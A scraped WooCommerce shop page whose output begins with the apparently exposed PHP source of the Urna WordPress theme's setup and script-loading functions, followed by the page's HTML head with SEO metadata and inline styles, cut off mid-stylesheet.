?>/ Add default posts and comments RSS feed links to head. add_theme_support('automatic-feed-links'); add_theme_support("post-thumbnails"); add_image_size('urna_avatar_post_carousel', 100, 100, true); // This theme styles the visual editor with editor-style.css to match the theme style. $font_source = urna_tbay_get_config('show_typography', false); if (!$font_source) { add_editor_style(array( 'css/editor-style.css', urna_fonts_url() )); } /* * Let WordPress manage the document title. * By adding theme support, we declare that this theme does not use a * hard-coded tag in the document head, and expect WordPress to * provide it for us. */ add_theme_support('title-tag'); /* * Switch default core markup for search form, comment form, and comments * to output valid HTML5. */ add_theme_support('html5', array( 'search-form', 'comment-form', 'comment-list', 'gallery', 'caption' )); add_theme_support("woocommerce"); /* * Enable support for Post Formats. * * See: https://codex.wordpress.org/Post_Formats */ add_theme_support('post-formats', array( 'aside', 'image', 'video', 'quote', 'link', 'gallery', 'audio' )); $color_scheme = urna_tbay_get_color_scheme(); $default_color = trim($color_scheme[0], '#'); // Setup the WordPress core custom background feature. add_theme_support('custom-background', apply_filters('urna_custom_background_args', array( 'default-color' => $default_color, 'default-attachment' => 'fixed', ))); urna_tbay_get_load_plugins(); } endif; // urna_tbay_setup add_action('after_setup_theme', 'urna_tbay_setup', 10); /** * Enqueue scripts and styles. * * @since Urna 1.0 */ function urna_tbay_scripts() { $suffix = (urna_tbay_get_config('minified_js', false)) ? '.min' : URNA_MIN_JS; // load bootstrap style if (is_rtl()) { wp_enqueue_style('bootstrap', URNA_STYLES . '/bootstrap.rtl.css', array(), '3.3.7'); } else { wp_enqueue_style('bootstrap', URNA_STYLES . '/bootstrap.css', array(), '3.3.7'); } $skin = urna_tbay_get_theme(); // Load our main stylesheet. if (is_rtl()) { $css_path = URNA_STYLES . '/template.rtl.css'; $css_skin = URNA_STYLES_SKINS . '/'.$skin.'/type.rtl.css'; } else { $css_path = URNA_STYLES . '/template.css'; $css_skin = URNA_STYLES_SKINS . '/'.$skin.'/type.css'; } $css_array = array(); if (urna_is_elementor_activated()) { array_push($css_array, 'elementor-frontend'); } wp_enqueue_style('urna-template', $css_path, $css_array, URNA_THEME_VERSION); wp_enqueue_style('urna-skin', $css_skin, array(), URNA_THEME_VERSION); $vc_style = urna_tbay_print_vc_style(); wp_add_inline_style('urna-template', $vc_style); wp_enqueue_style('urna-style', URNA_THEME_DIR . '/style.css', array(), URNA_THEME_VERSION); //load font awesome wp_enqueue_style('font-awesome', URNA_STYLES . '/font-awesome.css', array(), '4.7.0'); //load font custom icon tbay wp_enqueue_style('font-tbay', URNA_STYLES . '/font-tbay-custom.css', array(), '1.0.0'); //load simple-line-icons wp_enqueue_style('simple-line-icons', URNA_STYLES . '/simple-line-icons.css', array(), '2.4.0'); //load linear icons wp_enqueue_style('linearicons', URNA_STYLES . '/linearicons.css', array(), '1.0.0'); //load material font icons wp_enqueue_style('material-design-iconic-font', URNA_STYLES . '/material-design-iconic-font.css', array(), '1.0.0'); // load animate version 3.5.0 wp_enqueue_style('animate-css', URNA_STYLES . '/animate.css', array(), '3.5.0'); wp_enqueue_script('urna-skip-link-fix', URNA_SCRIPTS . '/skip-link-fix' . $suffix . '.js', array(), URNA_THEME_VERSION, true); if (is_singular() && comments_open() && get_option('thread_comments')) { wp_enqueue_script('comment-reply'); } wp_dequeue_script('wpb_composer_front_js'); wp_enqueue_script('wpb_composer_front_js'); /*mmenu menu*/ wp_register_script('jquery-mmenu', URNA_SCRIPTS . '/jquery.mmenu' . $suffix . '.js', array( 'jquery', 'underscore' ), '7.0.5', true); /*Treeview menu*/ wp_enqueue_style('jquery-treeview', URNA_STYLES . '/jquery.treeview.css', array(), '1.0.0'); /*hc sticky*/ wp_register_script('hc-sticky', URNA_SCRIPTS . '/hc-sticky' . $suffix . '.js', array( 'jquery' ), '2.1.0', true); wp_enqueue_script('bootstrap', URNA_SCRIPTS . '/bootstrap' . $suffix . '.js', array( 'jquery' ), '3.3.5', true); /*slick jquery*/ wp_register_script('slick', URNA_SCRIPTS . '/slick' . $suffix . '.js', array( 'jquery' ), '1.0.0', true); wp_register_script('urna-slick', URNA_SCRIPTS . '/custom-slick' . $suffix . '.js', array( 'jquery' ), URNA_THEME_VERSION, true); // Add js Sumoselect version 3.0.2 wp_register_style('sumoselect', URNA_STYLES . '/sumoselect.css', array(), '1.0.0', 'all'); wp_register_script('jquery-sumoselect', URNA_SCRIPTS . '/jquery.sumoselect' . $suffix . '.js', array( 'jquery' ), '3.0.2', true); wp_register_script('jquery-shuffle', URNA_SCRIPTS . '/jquery.shuffle' . $suffix . '.js', array( 'jquery' ), '3.0.0', true); wp_register_script('jquery-autocomplete', URNA_SCRIPTS . '/jquery.autocomplete' . $suffix . '.js', array( 'jquery', 'urna-script' ), '1.0.0', true); wp_enqueue_script('jquery-autocomplete'); wp_register_style('magnific-popup', URNA_STYLES . '/magnific-popup.css', array(), '1.0.0'); wp_enqueue_style('magnific-popup'); wp_register_script('jquery-countdowntimer', URNA_SCRIPTS . '/jquery.countdownTimer' . $suffix . '.js', array( 'jquery' ), '20150315', true); wp_register_style('jquery-fancybox', URNA_STYLES . '/jquery.fancybox.css', array(), '3.2.0'); wp_register_script('jquery-fancybox', URNA_SCRIPTS . '/jquery.fancybox' . $suffix . '.js', array( 'jquery' ), '2.1.7', true); wp_register_script('urna-script', URNA_SCRIPTS . '/functions' . $suffix . '.js', array('bootstrap'), URNA_THEME_VERSION, true); wp_register_script('urna-skins-script', URNA_SCRIPTS_SKINS . '/'.$skin . $suffix . '.js', array( 'urna-script' ), URNA_THEME_VERSION, true); if (wp_is_mobile()) { wp_enqueue_script('jquery-fastclick', URNA_SCRIPTS . '/jquery.fastclick' . $suffix . '.js', array( 'jquery' ), '1.0.6', true); } wp_enqueue_script('urna-skins-script'); if (urna_tbay_get_config('header_js') != "") { wp_add_inline_script('urna-script', urna_tbay_get_config('header_js')); } global $wp_query; $config = array( 'active_theme' => urna_tbay_get_theme(), 'ajaxurl' => admin_url('admin-ajax.php'), 'search_nonce' => wp_create_nonce('search_nonce'), 'category_open' => apply_filters('urna_category_inside_class', ''), 'lazyload' => (bool) urna_tbay_get_config('enable_lazyloadimage', true), 'quantity_minus' => apply_filters('tbay_quantity_minus', '<i class="linear-icon-minus"></i>'), 'quantity_plus' => apply_filters('tbay_quantity_plus', '<i class="linear-icon-plus"></i>'), 'quantity_mode' => (bool) apply_filters('urna_quantity_mode', 10, 2), 'cancel' => esc_html__('cancel', 'urna'), 'show_all_text' => esc_html__('View all', 'urna'), 'search' => esc_html__('Search', 'urna'), 'posts' => json_encode($wp_query->query_vars), // everything about your loop is here 'max_page' => $wp_query->max_num_pages, 'mobile' => wp_is_mobile(), ); if (defined('URNA_WOOCOMMERCE_ACTIVED') && URNA_WOOCOMMERCE_ACTIVED) { $full_width = urna_check_full_width(); $position = apply_filters('urna_cart_position', 10, 2); $woo_mode = urna_tbay_woocommerce_get_display_mode(); // loader gif $loader = apply_filters('tbay_quick_view_loader_gif', URNA_IMAGES . '/ajax-loader.gif'); $config['current_page'] = get_query_var('paged') ? get_query_var('paged') : 1; $config['popup_cart_icon'] = apply_filters('urna_popup_cart_icon', '<i class="linear-icon-cross"></i>', 2); $config['popup_cart_noti'] = esc_html__('was added to shopping cart.', 'urna'); $config['cart_position'] = $position; $config['ajax_update_quantity'] = (bool) urna_tbay_get_config('ajax_update_quantity', true); $config['full_width'] = $full_width['active']; $config['display_mode'] = $woo_mode; $config['loader'] = $loader; $config['ajax_popup_quick'] = apply_filters('urna_ajax_popup_quick', urna_is_ajax_popup_quick()); $config['enable_ajax_add_to_cart'] = (get_option('woocommerce_enable_ajax_add_to_cart') === 'yes') ? true : false; } /*Element ready default callback*/ if (urna_is_elementor_activated()) { $config['elements_ready'] = array( 'slick' => urna_elements_ready_slick(), 'countdowntimer' => urna_elements_ready_countdown_timer(), 'layzyloadimage' => urna_elements_ready_layzyload_image(), 'treeview' => urna_elements_ready_treeview(), ); } wp_localize_script('urna-script', 'urna_settings', $config); } add_action('wp_enqueue_scripts', 'urna_tbay_scripts', 100); function urna_tbay_footer_scripts() { if (urna_tbay_get_config('footer_js') != "") { $footer_js = urna_tbay_get_config('footer_js'); echo trim($footer_js); } } add_action('wp_footer', 'urna_tbay_footer_scripts'); add_action('login_enqueue_scripts', 'urna_tbay_load_admin_styles', 1000); add_action('admin_enqueue_scripts', 'urna_tbay_load_admin_styles', 1000); function urna_tbay_load_admin_styles() { wp_enqueue_style('material-design-iconic-font', URNA_STYLES . '/material-design-iconic-font.css', false, '2.2.0'); wp_enqueue_style('urna-custom-admin', URNA_STYLES . '/admin/custom-admin.css', false, '1.0.0'); } /** * Display descriptions in main navigation. * * @since Urna 1.0 * * @param string $item_output The menu item output. * @param WP_Post $item Menu item object. * @param int $depth Depth of the menu. * @param array $args wp_nav_menu() arguments. * @return string Menu item with possible description. */ function urna_tbay_nav_description($item_output, $item, $depth, $args) { if ('primary' == $args->theme_location && $item->description) { $item_output = str_replace($args->link_after . '</a>', '<div class="menu-item-description">' . $item->description . '</div>' . $args->link_after . '</a>', $item_output); } return $item_output; } add_filter('walker_nav_menu_start_el', 'urna_tbay_nav_description', 10, 4); /**Remove fonts scripts**/ if (!function_exists('urna_tbay_remove_fonts_redux_url')) { function urna_tbay_remove_fonts_redux_url() { $show_typography = urna_tbay_get_config('show_typography', false); if (!$show_typography) { wp_dequeue_style('redux-google-fonts-urna_tbay_theme_options'); } } add_action('wp_enqueue_scripts', 'urna_tbay_remove_fonts_redux_url', 9999); } /** * Add a `screen-reader-text` class to the search form's submit button. * * @since Urna 1.0 * * @param string $html Search form HTML. * @return string Modified search form HTML. */ function urna_tbay_search_form_modify($html) { return str_replace('class="search-submit"', 'class="search-submit screen-reader-text"', $html); } add_filter('get_search_form', 'urna_tbay_search_form_modify', 10, 1); function urna_tbay_get_config($name, $default = '') { global $urna_options; if (isset($urna_options[$name])) { return $urna_options[$name]; } return $default; } if (! function_exists('urna_time_link')) : /** * Gets a nicely formatted string for the published date. */ function urna_time_link() { $time_string = '<time class="entry-date published updated" datetime="%1$s">%2$s</time>'; $time_string = sprintf( $time_string, get_the_date(DATE_W3C), get_the_date(), get_the_modified_date(DATE_W3C), get_the_modified_date() ); // Wrap the time string in a link, and preface it with 'Posted on'. return sprintf( /* translators: %s: post date */ __('%sPosted on%s %s', 'urna'), '<span class="screen-reader-text">', '</span>', '<a href="' . esc_url(get_permalink()) . '" rel="bookmark">' . $time_string . '</a>' ); } endif; function urna_tbay_get_global_config($name, $default = '') { $options = get_option('urna_tbay_theme_options', array()); if (isset($options[$name])) { return $options[$name]; } return $default; } function urna_tbay_get_load_plugins() { $plugins[] =(array( 'name' => esc_html__('Cmb2', 'urna'), 'slug' => 'cmb2', 'required' => true, )); $plugins[] =(array( 'name' => esc_html__('WooCommerce', 'urna'), 'slug' => 'woocommerce', 'required' => true, )); $plugins[] =(array( 'name' => esc_html__('MailChimp', 'urna'), 'slug' => 'mailchimp-for-wp', 'required' => true )); $plugins[] =(array( 'name' => esc_html__('Contact Form 7', 'urna'), 'slug' => 'contact-form-7', 'required' => true, )); $plugins[] =(array( 'name' => esc_html__('WPBakery Visual Composer', 'urna'), 'slug' => 'js_composer', 'required' => true, 'source' => esc_url('plugins.thembay.com/js_composer.zip'), )); $plugins[] =(array( 'name' => esc_html__('Urna Core', 'urna'), 'slug' => 'urna-core', 'required' => true , 'source' => esc_url('plugins.thembay.com/urna-core.zip'), )); $plugins[] =(array( 'name' => 'Redux – Gutenberg Blocks Library & Framework', 'slug' => 'redux-framework', 'required' => true , )); $plugins[] =(array( 'name' => esc_html__('WooCommerce Variation Swatches', 'urna'), 'slug' => 'woo-variation-swatches', 'required' => true, 'source' => esc_url('downloads.wordpress.org/plugin/woo-variation-swatches.zip'), )); $plugins[] =(array( 'name' => esc_html__('WooCommerce Products Filter', 'urna'), 'slug' => 'woocommerce-products-filter', 'required' => true, 'source' => esc_url('plugins.thembay.com/woocommerce-products-filter.zip'), )); $plugins[] =(array( 'name' => esc_html__('WooCommerce Photo Reviews', 'urna'), 'slug' => 'woo-photo-reviews', 'required' => false, )); $plugins[] =(array( 'name' => esc_html__('Revolution Slider', 'urna'), 'slug' => 'revslider', 'required' => true , 'source' => esc_url('plugins.thembay.com/revslider.zip'), )); $plugins[] =(array( 'name' => esc_html__('Elementor Page Builder', 'urna'), 'slug' => 'elementor', 'required' => true )); tgmpa($plugins); } require_once(get_parent_theme_file_path(URNA_INC . '/plugins/class-tgm-plugin-activation.php')); /**Include Merlin Import Demo**/ require_once(get_parent_theme_file_path(URNA_MERLIN . '/vendor/autoload.php')); require_once(get_parent_theme_file_path(URNA_MERLIN . '/class-merlin.php')); require_once(get_parent_theme_file_path(URNA_INC . '/merlin-config.php')); require_once(get_parent_theme_file_path(URNA_INC . '/functions-helper.php')); require_once(get_parent_theme_file_path(URNA_INC . '/functions-frontend.php')); require_once(get_parent_theme_file_path(URNA_INC . '/functions-mobile.php')); require_once(get_parent_theme_file_path(URNA_INC . '/skins/'.urna_tbay_get_theme().'/functions.php')); /** * Implement the Custom Header feature. * */ require_once(get_parent_theme_file_path(URNA_INC . '/custom-header.php')); /** * Classess file * */ /** * Implement the Custom Styles feature. * */ require_once(get_parent_theme_file_path(URNA_INC . '/custom-styles.php')); /** * Register Sidebar * */ if (!function_exists('urna_tbay_widgets_init')) { function urna_tbay_widgets_init() { /* Check Redux */ if (defined('URNA_CORE_ACTIVED') && URNA_CORE_ACTIVED) { register_sidebar(array( 'name' => esc_html__('Newsletter Popup', 'urna'), 'id' => 'newsletter-popup', 'description' => esc_html__('Add widgets here to appear in your site.', 'urna'), 'before_widget' => '<aside id="%1$s" class="widget %2$s">', 'after_widget' => '</aside>', 'before_title' => '<h2 class="widget-title">', 'after_title' => '</h2>', )); } /* End Check Redux */ register_sidebar(array( 'name' => esc_html__('Sidebar Default', 'urna'), 'id' => 'sidebar-default', 'description' => esc_html__('Add widgets here to appear in your Sidebar.', 'urna'), 'before_widget' => '<aside id="%1$s" class="widget %2$s">', 'after_widget' => '</aside>', 'before_title' => '<h2 class="widget-title">', 'after_title' => '</h2>', )); /* Check Redux */ if (defined('URNA_CORE_ACTIVED') && URNA_CORE_ACTIVED) { register_sidebar(array( 'name' => esc_html__('Blog Archive Sidebar', 'urna'), 'id' => 'blog-archive-sidebar', 'description' => esc_html__('Add widgets here to appear in your sidebar.', 'urna'), 'before_widget' => '<aside id="%1$s" class="widget %2$s">', 'after_widget' => '</aside>', 'before_title' => '<h2 class="widget-title">', 'after_title' => '</h2>', )); register_sidebar(array( 'name' => esc_html__('Blog Single Sidebar', 'urna'), 'id' => 'blog-single-sidebar', 'description' => esc_html__('Add widgets here to appear in your sidebar.', 'urna'), 'before_widget' => '<aside id="%1$s" class="widget %2$s">', 'after_widget' => '</aside>', 'before_title' => '<h2 class="widget-title">', 'after_title' => '</h2>', )); register_sidebar(array( 'name' => esc_html__('Product Top Archive Product', 'urna'), 'id' => 'product-top-archive', 'description' => esc_html__('Add widgets here to appear in your sidebar.', 'urna'), 'before_widget' => '<aside id="%1$s" class="widget %2$s">', 'after_widget' => '</aside>', 'before_title' => '<h2 class="widget-title">', 'after_title' => '</h2>', )); register_sidebar(array( 'name' => esc_html__('Product Archive Sidebar', 'urna'), 'id' => 'product-archive', 'description' => esc_html__('Add widgets here to appear in Product archive left, right sidebar.', 'urna'), 'before_widget' => '<aside id="%1$s" class="widget %2$s">', 'after_widget' => '</aside>', 'before_title' => '<h2 class="widget-title">', 'after_title' => '</h2>', )); register_sidebar(array( 'name' => esc_html__('Product Single Inner Sidebar', 'urna'), 'id' => 'product-single', 'description' => esc_html__('Add widgets here to appear in Product single left, right sidebar.', 'urna'), 'before_widget' => '<aside id="%1$s" class="widget %2$s">', 'after_widget' => '</aside>', 'before_title' => '<h2 class="widget-title">', 'after_title' => '</h2>', )); register_sidebar(array( 'name' => esc_html__('Product Single Normal Sidebar', 'urna'), 'id' => 'product-single-normal', 'description' => esc_html__('Add widgets here to appear in Product single left, right sidebar.', 'urna'), 'before_widget' => '<aside id="%1$s" class="widget %2$s">', 'after_widget' => '</aside>', 'before_title' => '<h2 class="widget-title">', 'after_title' => '</h2>', )); register_sidebar(array( 'name' => esc_html__('Product Sidebar Mobile', 'urna'), 'id' => 'sidebar-mobile', 'description' => esc_html__('Add widgets here to appear in Product archive in mobile', 'urna'), 'before_widget' => '<aside id="%1$s" class="widget %2$s">', 'after_widget' => '</aside>', 'before_title' => '<h2 class="widget-title">', 'after_title' => '</h2>', )); } /* End Check Redux */ /* Check WPML */ if (urna_is_wpml_activated()) { register_sidebar(array( 'name' => esc_html__('WPML Sidebar', 'urna'), 'id' => 'wpml-sidebar', 'description' => esc_html__('Add widgets here to appear.', 'urna'), 'before_widget' => '<aside id="%1$s" class="widget %2$s">', 'after_widget' => '</aside>', 'before_title' => '<h2 class="widget-title">', 'after_title' => '</h2>', )); } /* End check WPML */ register_sidebar(array( 'name' => esc_html__('Footer', 'urna'), 'id' => 'footer', 'description' => esc_html__('Add widgets here to appear in your sidebar.', 'urna'), 'before_widget' => '<aside id="%1$s" class="widget %2$s">', 'after_widget' => '</aside>', 'before_title' => '<h2 class="widget-title">', 'after_title' => '</h2>', )); } add_action('widgets_init', 'urna_tbay_widgets_init'); } if (!function_exists('urna_dokan_theme_store_sidebar')) { function urna_dokan_theme_store_sidebar() { if (function_exists('dokan_get_option') && dokan_get_option('enable_theme_store_sidebar', 'dokan_appearance', 'off') === 'off' && dokan_is_store_page()) { return true; } else { return false; } } } require_once(get_parent_theme_file_path(URNA_CLASSES . '/megamenu.php')); require_once(get_parent_theme_file_path(URNA_CLASSES . '/custommenu.php')); require_once(get_parent_theme_file_path(URNA_CLASSES . '/mmenu.php')); /** * Custom template tags for this theme. * */ require_once(get_parent_theme_file_path(URNA_INC . '/template-tags.php')); require_once(get_parent_theme_file_path(URNA_INC . '/template-hooks.php')); if (urna_is_cmb2()) { require_once(get_parent_theme_file_path(URNA_VENDORS . '/cmb2/page.php')); require_once(get_parent_theme_file_path(URNA_VENDORS . '/cmb2/post.php')); } if (urna_is_Woocommerce_activated()) { require_once(get_parent_theme_file_path(URNA_VENDORS . '/woocommerce/wc-admin.php')); require_once(get_parent_theme_file_path(URNA_VENDORS . '/woocommerce/skins/'.urna_tbay_get_theme().'.php')); require_once(get_parent_theme_file_path(URNA_VENDORS . '/woocommerce/wc-functions.php')); require_once(get_parent_theme_file_path(URNA_VENDORS . '/woocommerce/wc-recently-viewed.php')); require_once(get_parent_theme_file_path(URNA_VENDORS . '/woocommerce/wc-shop.php')); require_once(get_parent_theme_file_path(URNA_VENDORS . '/woocommerce/wc-single-functions.php')); require_once(get_parent_theme_file_path(URNA_VENDORS . '/woocommerce/wc-ajax-auth.php')); require_once(get_parent_theme_file_path(URNA_VENDORS . '/woocommerce/wc-hooks.php')); require_once(get_parent_theme_file_path(URNA_VENDORS . '/woocommerce/compatible/wc_vendors.php')); require_once(get_parent_theme_file_path(URNA_VENDORS . '/woocommerce/compatible/wc-dokan.php')); require_once(get_parent_theme_file_path(URNA_VENDORS . '/woocommerce/compatible/wcfm_multivendor.php')); require_once(get_parent_theme_file_path(URNA_VENDORS . '/woocommerce/compatible/wcmp_vendor.php')); require_once(get_parent_theme_file_path(URNA_VENDORS . '/woocommerce/compatible/woo-brand-pro.php')); require_once(get_parent_theme_file_path(URNA_VENDORS . '/woocommerce/compatible/woo-variation-swatches-pro.php')); require_once(get_parent_theme_file_path(URNA_VENDORS . '/woocommerce/compatible/multi-step-checkout.php')); } require_once(get_parent_theme_file_path(URNA_VENDORS . '/visualcomposer/functions.php')); require_once(get_parent_theme_file_path(URNA_VENDORS . '/visualcomposer/vc-maps.php')); if (urna_is_Woocommerce_activated()) { require_once(get_parent_theme_file_path(URNA_VENDORS . '/visualcomposer/vc-maps-woo.php')); } if (defined('URNA_CORE_ACTIVED')) { require_once(get_parent_theme_file_path(URNA_WIDGETS . '/custom_menu.php')); require_once(get_parent_theme_file_path(URNA_WIDGETS . '/list-categories.php')); require_once(get_parent_theme_file_path(URNA_WIDGETS . '/popular_posts.php')); if (function_exists('mc4wp_show_form')) { require_once(get_parent_theme_file_path(URNA_WIDGETS . '/popup_newsletter.php')); } require_once(get_parent_theme_file_path(URNA_WIDGETS . '/posts.php')); require_once(get_parent_theme_file_path(URNA_WIDGETS . '/recent_comment.php')); require_once(get_parent_theme_file_path(URNA_WIDGETS . '/recent_post.php')); require_once(get_parent_theme_file_path(URNA_WIDGETS . '/single_image.php')); require_once(get_parent_theme_file_path(URNA_WIDGETS . '/banner_image.php')); require_once(get_parent_theme_file_path(URNA_WIDGETS . '/socials.php')); require_once(get_parent_theme_file_path(URNA_WIDGETS . '/top_rate.php')); require_once(get_parent_theme_file_path(URNA_WIDGETS . '/video.php')); require_once(get_parent_theme_file_path(URNA_WIDGETS . '/woo-carousel.php')); require_once(get_parent_theme_file_path(URNA_WIDGETS . '/yith-brand-image.php')); require_once(get_parent_theme_file_path(URNA_VENDORS . '/redux-framework/redux-config.php')); } /** * Customizer additions. * */ require_once(get_parent_theme_file_path(URNA_INC . '/skins/'.urna_tbay_get_theme().'/customizer.php')); if (urna_is_elementor_activated()) { require_once(get_parent_theme_file_path(URNA_VENDORS . '/elementor/class-elementor.php')); require_once(get_parent_theme_file_path(URNA_VENDORS . '/elementor/class-elementor-pro.php')); require_once(get_parent_theme_file_path(URNA_VENDORS . '/elementor/icons/icons.php')); } ?><!DOCTYPE html> <html lang="en-US" class="no-js"> <head> <meta charset="UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="profile" href="//gmpg.org/xfn/11" /> <meta name='robots' content='max-image-preview:large, noindex, follow' /> <!-- This site is optimized with the Yoast SEO Premium plugin v14.8 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="robots" content="index, follow" /> <meta name="googlebot" content="index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1" /> <meta name="bingbot" content="index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1" /> <link rel="canonical" href="https://techyreview.in/my-account/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="article" /> <meta property="og:title" content="My account - Techy Review" /> <meta property="og:url" content="https://techyreview.in/my-account/" /> <meta property="og:site_name" content="Techy Review" /> <meta name="twitter:card" content="summary_large_image" /> <script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://techyreview.in/#website","url":"https://techyreview.in/","name":"Techy Review","description":"","potentialAction":[{"@type":"SearchAction","target":"https://techyreview.in/?s={search_term_string}","query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https://techyreview.in/my-account/#webpage","url":"https://techyreview.in/my-account/","name":"My account - Techy Review","isPartOf":{"@id":"https://techyreview.in/#website"},"datePublished":"2023-02-23T12:12:56+00:00","dateModified":"2023-02-23T12:12:56+00:00","inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https://techyreview.in/my-account/"]}]}]}</script> <!-- / Yoast SEO Premium plugin. --> <link href='https://fonts.gstatic.com' crossorigin rel='preconnect' /> <!-- This site uses the Google Analytics by MonsterInsights plugin v8.12.1 - Using Analytics tracking - https://www.monsterinsights.com/ --> <!-- Note: MonsterInsights is not currently configured on this site. The site owner needs to authenticate with Google Analytics in the MonsterInsights settings panel. --> <!-- No UA code set --> <!-- / Google Analytics by MonsterInsights --> <link rel='stylesheet' id='woof-sd-switcher23-css' href='https://techyreview.in/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/elements/switcher.css?ver=3.3.2' type='text/css' media='all' /> <link rel='stylesheet' id='sbi_styles-css' href='https://techyreview.in/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=6.1.1' type='text/css' media='all' /> <style id='wp-emoji-styles-inline-css' type='text/css'> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 0.07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://techyreview.in/wp-includes/css/dist/block-library/style.min.css?ver=6.6.1' type='text/css' media='all' /> <link rel='stylesheet' id='wc-blocks-vendors-style-css' href='https://techyreview.in/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-vendors-style.css?ver=9.4.3' type='text/css' media='all' /> <link rel='stylesheet' id='wc-blocks-style-css' href='https://techyreview.in/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/wc-blocks-style.css?ver=9.4.3' type='text/css' media='all' /> <style id='classic-theme-styles-inline-css' type='text/css'> /*! This file is auto-generated */ .wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none} </style> <style id='global-styles-inline-css' type='text/css'> :root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: 